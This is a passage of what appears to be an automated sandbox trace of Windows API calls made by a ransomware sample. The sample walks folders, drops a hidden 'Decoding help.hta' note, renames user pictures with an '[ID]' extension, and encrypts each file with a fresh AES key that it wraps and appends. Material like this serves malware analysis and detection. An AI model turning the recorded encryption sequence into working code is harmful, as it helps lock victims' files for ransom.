lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*" [0040.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*") returned 67 [0040.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\", lpString2="v1.0" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0" [0040.414] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0040.414] GlobalMemoryStatus (in: lpBuffer=0xe84fd10 | out: lpBuffer=0xe84fd10) [0040.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97aa438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x298 [0040.414] CloseHandle (hObject=0x298) returned 1 [0040.414] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xe84fd30 | out: lpFindFileData=0xe84fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 0 [0040.414] FindClose (in: hFindFile=0x5a5cf0 | out: hFindFile=0x5a5cf0) returned 1 Thread: id = 187 os_tid = 0x8d8 [0040.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0042.060] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.060] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.060] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.060] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.060] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1 [0042.060] lstrcmpW (lpString1=".", lpString2="Device") returned -1 [0042.060] lstrcmpW (lpString1="..", lpString2="Device") returned -1 [0042.060] lstrcmpiW (lpString1="windows", lpString2="Device") returned 1 [0042.061] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*" [0042.061] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*") returned 45 [0042.061] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\", lpString2="Device" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device" [0042.061] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*" [0042.061] GlobalMemoryStatus (in: lpBuffer=0x674fd10 | out: lpBuffer=0x674fd10) [0042.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x980a5d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.061] CloseHandle (hObject=0x518) returned 1 [0042.062] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1 [0042.062] lstrcmpW (lpString1=".", lpString2="Task") returned -1 [0042.062] lstrcmpW (lpString1="..", lpString2="Task") returned -1 [0042.062] lstrcmpiW (lpString1="windows", lpString2="Task") returned 1 [0042.062] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*" [0042.062] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*.*") returned 45 [0042.062] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\", lpString2="Task" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" [0042.062] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*.*" [0042.062] GlobalMemoryStatus (in: lpBuffer=0x674fd10 | out: lpBuffer=0x674fd10) [0042.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c00118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x518 [0042.063] CloseHandle (hObject=0x518) returned 1 [0042.063] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 0 [0042.063] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 188 os_tid = 0x8dc [0040.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*.*", lpFindFileData=0xe98fd30 | out: lpFindFileData=0xe98fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 189 os_tid = 0x8e0 [0040.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Oracle\\*.*", lpFindFileData=0xeacfd30 | out: lpFindFileData=0xeacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5cf0 [0040.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.417] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xeacfd30 | out: lpFindFileData=0xeacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.417] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.417] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xeacfd30 | out: lpFindFileData=0xeacfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0040.417] FindClose (in: hFindFile=0x5a5cf0 | out: hFindFile=0x5a5cf0) returned 1 Thread: id = 190 os_tid = 0x8d4 [0040.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x101018d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x101018d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5cf0 [0040.418] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.418] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x101018d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x101018d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.419] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.419] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.419] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe77cc440, ftCreationTime.dwHighDateTime=0x1d4c5f5, ftLastAccessTime.dwLowDateTime=0x3409e800, ftLastAccessTime.dwHighDateTime=0x1d4c953, ftLastWriteTime.dwLowDateTime=0x3409e800, ftLastWriteTime.dwHighDateTime=0x1d4c953, nFileSizeHigh=0x0, nFileSizeLow=0xaf44, dwReserved0=0x0, dwReserved1=0x0, cFileName="1ZpD.gif", cAlternateFileName="")) returned 1 [0040.419] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0040.419] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0040.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" [0040.419] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta")) returned 0xffffffff [0040.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0040.778] WriteFile (in: hFile=0x328, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xec0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.779] CloseHandle (hObject=0x328) returned 1 [0040.779] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.189] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1ZpD.gif") returned 1 [0041.189] lstrlenW (lpString="1ZpD.gif") returned 8 [0041.189] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0041.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0041.189] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="1ZpD.gif" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif" [0041.189] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif" [0041.189] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0041.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1zpd.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1zpd.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1zpd.gif.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0041.191] CreateFileMappingA (hFile=0x3e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3e8 [0041.191] CryptAcquireContextA (in: phProv=0xec0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xec0fcec*=0x34493e0) returned 1 [0043.829] CryptGenKey (in: hProv=0x34493e0, Algid=0x6610, dwFlags=0x1, phKey=0xec0fce8 | out: phKey=0xec0fce8*=0x5d8690) returned 1 [0043.829] CryptExportKey (in: hKey=0x5d8690, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xec0fbe4, pdwDataLen=0xec0fce4 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fce4*=0x2c) returned 1 [0043.829] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf40) returned 0x4440000 [0044.099] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x100) returned 1 [0046.956] CryptEncrypt (in: hKey=0x5d8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4440000, pdwDataLen=0xec0fce4*=0xaf40, dwBufLen=0xaf40 | out: pbData=0x4440000*, pdwDataLen=0xec0fce4*=0xaf40) returned 1 [0046.957] UnmapViewOfFile (lpBaseAddress=0x4440000) returned 1 [0046.959] CloseHandle (hObject=0x3e8) returned 1 [0046.959] CryptDestroyKey (hKey=0x5d8690) returned 1 [0046.959] CryptReleaseContext (hProv=0x34493e0, dwFlags=0x0) returned 1 [0046.959] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.959] WriteFile (in: hFile=0x3e4, lpBuffer=0xec0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xec0fbe4*, lpNumberOfBytesWritten=0xec0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.960] WriteFile (in: hFile=0x3e4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xec0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.960] CloseHandle (hObject=0x3e4) returned 1 [0046.961] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1ZpD.gif.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.962] FindNextFileW (in: hFindFile=0x5a5cf0, lpFindFileData=0xec0fd30 | out: lpFindFileData=0xec0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b33400, ftCreationTime.dwHighDateTime=0x1d4d409, ftLastAccessTime.dwLowDateTime=0x30542bd0, ftLastAccessTime.dwHighDateTime=0x1d4d0ce, ftLastWriteTime.dwLowDateTime=0x30542bd0, ftLastWriteTime.dwHighDateTime=0x1d4d0ce, nFileSizeHigh=0x0, nFileSizeLow=0x115e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="2m0jDWJRbuSJx.bmp", cAlternateFileName="2M0JDW~1.BMP")) returned 1 [0046.962] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0046.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0046.962] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" [0046.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\decoding help.hta")) returned 0x1 [0046.962] lstrcmpiW (lpString1="Decoding help.hta", lpString2="2m0jDWJRbuSJx.bmp") returned 1 [0046.962] lstrlenW (lpString="2m0jDWJRbuSJx.bmp") returned 17 [0046.962] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0046.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned 46 [0046.962] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="2m0jDWJRbuSJx.bmp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp" [0046.962] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp" [0046.962] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0046.962] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2m0jdwjrbusjx.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2m0jdwjrbusjx.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2m0jDWJRbuSJx.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2m0jdwjrbusjx.bmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0046.963] CreateFileMappingA (hFile=0x3e4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3e8 [0046.963] CryptAcquireContextA (in: phProv=0xec0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xec0fcec*=0x34493e0) returned 1 [0046.964] CryptGenKey (in: hProv=0x34493e0, Algid=0x6610, dwFlags=0x1, phKey=0xec0fce8 | out: phKey=0xec0fce8*=0x5d8550) returned 1 [0046.964] CryptExportKey (in: hKey=0x5d8550, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xec0fbe4, pdwDataLen=0xec0fce4 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fce4*=0x2c) returned 1 [0046.964] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x115e0) returned 0x3210000 [0046.966] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xec0fbe4*, pdwDataLen=0xec0fcf8*=0x100) returned 1 [0046.966] CryptEncrypt (in: hKey=0x5d8550, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3210000, pdwDataLen=0xec0fce4*=0x115e0, dwBufLen=0x115e0 | out: pbData=0x3210000*, pdwDataLen=0xec0fce4*=0x115e0) returned 1 [0046.967] UnmapViewOfFile (lpBaseAddress=0x3210000) returned 1 [0046.969] CloseHandle (hObject=0x3e8) returned 1 [0046.969] CryptDestroyKey (hKey=0x5d8550) returned 1 [0046.969] CryptReleaseContext (hProv=0x34493e0, dwFlags=0x0) returned 1 [0046.969] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.969] WriteFile (in: hFile=0x3e4, lpBuffer=0xec0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xec0fbe4*, lpNumberOfBytesWritten=0xec0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.970] WriteFile (in: hFile=0x3e4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xec0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xec0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.970] CloseHandle (hObject=0x3e4) returned 1 [0046.971] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 